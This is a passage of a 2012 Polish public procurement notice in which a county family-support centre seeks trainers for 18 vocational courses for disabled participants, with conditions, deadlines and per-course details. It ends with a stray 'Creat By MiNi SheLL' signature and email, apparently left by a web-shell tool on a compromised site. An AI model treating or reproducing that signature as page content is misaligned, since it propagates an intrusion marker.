Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Termin realizacji Od 1 sierpnia 2012 r. do 31 października 2012 r.
Prowadzący Prowadzący wykładowca mający uprawnienia
i doświadczenie w prowadzeniu kursu księgowość + płatnik
Obowiązki
Wykonawcy
Wykonawca zabezpiecza w ramach kursu:
1. materiały szkoleniowe i fachową literaturę niezbędną do
przeprowadzenia kursu,
2. materiały biurowe, piśmiennicze (w tym co najmniej
długopis, ołówek, zeszyt/notatnik do zajęć teoretycznych)
3. ubezpieczenie uczestnika,
4. szkolenie BHP,
5. salę szkoleniową,
6. catering- (min. 6 kanapek dla uczestnika ) lub obiad, ciastka
oraz napoje ciepłe (kawa, herbata) i napoje zimne dla
uczestników(woda gazowana lub woda niegazowana)
7. realizację kursu według przygotowanego przez siebie
i zaakceptowanego przez zamawiającego programu
i harmonogramu kursu
Badania lekarskie Nie dotyczy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 18.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstąpił od obowiązku wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy, którzy:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli
przepisy prawa nakładają obowiązek posiadania takich uprawnień,
a w szczególności posiadać wpis do rejestru instytucji szkoleniowych prowadzonego
przez wojewódzki urząd pracy, właściwy ze względu na siedzibę instytucji szkoleniowej.
Wymagania szczegółowe dla każdego zadania opisane w pkt. C SIWZ dla każdej części.
Na potwierdzenie spełnienia warunku Wykonawca składa oświadczenia (załącznik nr 2
do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagania szczegółowe dla każdego zadania opisane w pkt. C SIWZ dla każdej części. Na
potwierdzenie spełnienia warunku Wykonawca składa oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagania szczegółowe dla każdego zadania opisane w pkt. C SIWZ dla każdej części. Na
potwierdzenie spełnienia warunku Wykonawca składa oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagania szczegółowe dla każdego zadania opisane w pkt. C SIWZ dla każdej części. Na
potwierdzenie spełnienia warunku Wykonawca składa oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatswidwinski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie
ul. Koszalińska 12, 78-320 Połczyn-Zdrój.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.07.2012 godzina 11:00, miejsce: Powiatowe Centrum Pomocy Rodzinie
ul. Koszalińska 12, 78-320 Połczyn-Zdrój
Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach
Europejskiego Funduszu Społecznego
Projekt pn. Samodzielność zobowiązuje
w ramach Priorytetu VII Promocja integracji społecznej Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Prawo jazdy kat. B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników
do przeszkolenia
12
Liczba godzin 60 godz. (w tym zajęcia teoretyczne i praktyczne)
Termin realizacji od 1 sierpnia 2012 r. do 30 listopada 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Prawo jazdy kat. T.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników
do przeszkolenia
1
Liczba godzin 60 godzin(w tym 30 godzin zajęć teoretycznych i 30 godzin zajęć
praktycznych)
Termin realizacji od 1 sierpnia 2012 r. do 30 listopada 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Prawo jazdy kat. C.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników
do przeszkolenia
1
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Liczba godzin 60 godzin(w tym 30 godzin zajęć teoretycznych i 30 godzin zajęć
praktycznych)
Termin realizacji od 1 sierpnia 2012 r. do 30 listopada 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Operator koparko-ładowarki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników
do przeszkolenia
2
Beneficjentami projektu są osoby niepełnosprawne(brak osób na
wózku inwalidzkim)
Liczba godzin Zajęcia teoretyczne 116 godzin ( w tym egzamin wewnętrzny);
Zajęcia praktyczne 86 zajęć ( w tym egzamin wewnętrzny)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Termin realizacji od 1 sierpnia 2012 r. do 30 listopada 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Rękodzieło.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników
do przeszkolenia
5
Beneficjentami projektu są osoby niepełnosprawne(brak osób na
wózku inwalidzkim)
Liczba godzin 40 godz. (zajęcia teoretyczne i praktyczne)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Termin realizacji od 1 sierpnia 2012 r. do 31 października 2012r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Podstawy Obsługi Komputera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników
do przeszkolenia
6
Beneficjentami projektu są osoby niepełnosprawne (brak osób na
wózkach inwalidzkich)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Liczba godzin 50 godz. (zajęcia teoretyczne i praktyczne)
Termin realizacji od 1 sierpnia 2012 r. do 31 października 2012r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Kurs komputerowy z obsługą kas fiskalnych, minimum sanitarnym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników
do przeszkolenia
4
Beneficjentami projektu są osoby niepełnosprawne(brak osób na
wózkach inwalidzkich)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Liczba godzin 50 godz. (zajęcia teoretyczne i praktyczne)
Termin realizacji Od 1 sierpnia 2012 r. do 31 października 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Usprawnienia SEP do 1 KV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników
do przeszkolenia
3
Beneficjentami projektu są osoby niepełnosprawne(brak osób na
wózku inwalidzkim)
Liczba godzin 40 godz. (zajęcia teoretyczne i praktyczne)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Termin realizacji Od 1 sierpnia 2012 r. do 31 października 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Bukieciarstwo/florystyka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników
do przeszkolenia
2
Beneficjentami projektu są osoby niepełnosprawne(brak osób na
wózku inwalidzkim)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Liczba godzin 100 godz. (zajęcia teoretyczne i praktyczne)
Termin realizacji Od 1 sierpnia 2012 r. do 31 października 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pomoc Kuchenna/Kucharz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników
do przeszkolenia
2
Beneficjentami projektu są osoby niepełnosprawne(brak osób na
wózku inwalidzkim)
Liczba godzin 80 godz. (zajęcia teoretyczne i praktyczne)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Termin realizacji Od 1 sierpnia 2012 r. do 31 października 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Catering.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników
do przeszkolenia
6
Liczba godzin 100 godz. (zajęcia teoretyczne i praktyczne)
Beneficjentami projektu są osoby niepełnosprawne(brak osób na
wózku inwalidzkim)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Termin realizacji Od 1 sierpnia 2012 r. do 31 października 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Wózki widłowe z wymianą butli.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Beneficjentami projektu są osoby niepełnosprawne(brak osób na
wózku inwalidzkim)
Liczba godzin 60 godz. (zajęcia teoretyczne i praktyczne)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Termin realizacji Od 1sierpnia 2012 r. do 31 października 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Glazurnik.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników
do przeszkolenia
4
Beneficjentami projektu są osoby niepełnosprawne(brak osób na
wózku inwalidzkim)
Liczba godzin 220 godz. (zajęcia teoretyczne i praktyczne)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Termin realizacji Od 1 sierpnia 2012 r. do 30 listopada 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Opiekun osób starszych z elementami języka niemieckiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników
do przeszkolenia
2
Beneficjentami projektu są osoby niepełnosprawne(brak osób na
wózku inwalidzkim)
Liczba godzin 120 godz. (zajęcia teoretyczne i praktyczne)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Termin realizacji Od 1sierpnia 2012 r. do 30 listopada 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Makijaż i stylizacja paznokci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników do przeszkolenia 4
Beneficjentami projektu są osoby niepełnosprawne(brak osób na
wózku inwalidzkim)
Liczba godzin 60 godz. (zajęcia teoretyczne i praktyczne)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Termin realizacji Od 1 sierpnia 2012 r. do 30 listopada 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Angielski średniozaawansowany.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników
do przeszkolenia
1
Beneficjentami projektu są osoby niepełnosprawne(brak osób na
wózku inwalidzkim)
Liczba godzin 120 godz. (zajęcia teoretyczne i praktyczne)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Termin realizacji Od 1 sierpnia 2012 r. do 30 listopada 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Masaż klasyczny I stopnia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników
do przeszkolenia
3
Beneficjentami projektu są osoby niepełnosprawne(brak osób na
wózku inwalidzkim)
Liczba godzin 80 godz. (zajęcia teoretyczne i praktyczne)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Termin realizacji Od 1 sierpnia 2012 r. do 31 października 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Księgowość i Płatnik.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników
do przeszkolenia
1
Beneficjentami projektu są osoby niepełnosprawne(brak osób na
wózku inwalidzkim)
Liczba godzin 80 godz. (zajęcia teoretyczne i praktyczne)
Możliwość organizacji kursów także w godzinach
popołudniowych(w uzgodnieniu z zamawiającym)
Termin realizacji Od 1 sierpnia 2012 r. do 31 października 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com